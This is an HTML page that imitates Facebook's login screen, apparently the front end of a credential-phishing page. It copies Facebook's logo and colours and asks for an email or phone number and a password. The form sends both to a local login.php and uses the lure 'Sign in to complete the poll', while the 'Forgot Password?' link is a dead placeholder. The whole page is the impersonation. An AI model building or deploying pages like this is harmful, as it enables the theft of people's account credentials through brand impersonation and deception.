<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <title>Facebook Login</title>
  <link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
  <link href="https://fonts.googleapis.com/css?family=Raleway" rel="stylesheet">
  <style>
    /* Paste your CSS styles here */
    body {
      background-color: #f0f2f5;
      font-family: Arial, sans-serif;
    }
    
    .container {
      max-width: 360px;
      margin: 0 auto;
      padding-top: 80px;
    }
    
    .facebook-logo {
      display: block;
      margin: 0 auto 30px auto;
      width: 150px; /* Adjust the width as needed */
    }
    
    .login-form {
      background-color: #fff;
      border-radius: 8px;
      padding: 40px;
      box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
    }
    
    .login-form input[type="text"],
    .login-form input[type="password"] {
      width: 100%;
      border: 1px solid #ddd;
      padding: 10px;
      margin-bottom: 20px;
      border-radius: 4px;
    }
    
    .login-form input[type="submit"] {
      width: 100%;
      background-color: #1877f2;
      color: #fff;
      border: none;
      padding: 12px;
      border-radius: 4px;
      cursor: pointer;
      font-size: 16px;
    }
    
    .login-form input[type="submit"]:hover {
      background-color: #166fe5;
    }
    
    .login-form .forgot-password {
      text-align: center;
      margin-top: 10px;
    }
    
    .login-form .forgot-password a {
      color: #1877f2;
      text-decoration: none;
    }

    .login-form .complete-poll {
      text-align: center;
      margin-top: 20px;
      font-size: 14px;
      color: #777;
    }

    .login-form .complete-poll:before,
    .login-form .complete-poll:after {
      content: "";
      display: inline-block;
      width: 30px;
      height: 15px;
      background-color: #ddd;
      vertical-align: middle;
      margin: 0 10px;
    }
  </style>
</head>
<body>
  <div class="container">
    <img class="facebook-logo" src="https://upload.wikimedia.org/wikipedia/commons/5/51/Facebook_f_logo_%282019%29.svg" alt="Facebook Logo">
    <form class="login-form" action="login.php" method="post">
      <input type="text" name="email" placeholder="Email address or phone number" required>
      <input type="password" name="pass" placeholder="Password" required>
      <input type="submit" value="Log In">
      <div class="forgot-password">
        <a href="#">Forgot Password?</a>
      </div>
      <div class="complete-poll">
        Sign in to complete the poll
      </div>
    </form>
  </div>
</body>
</html>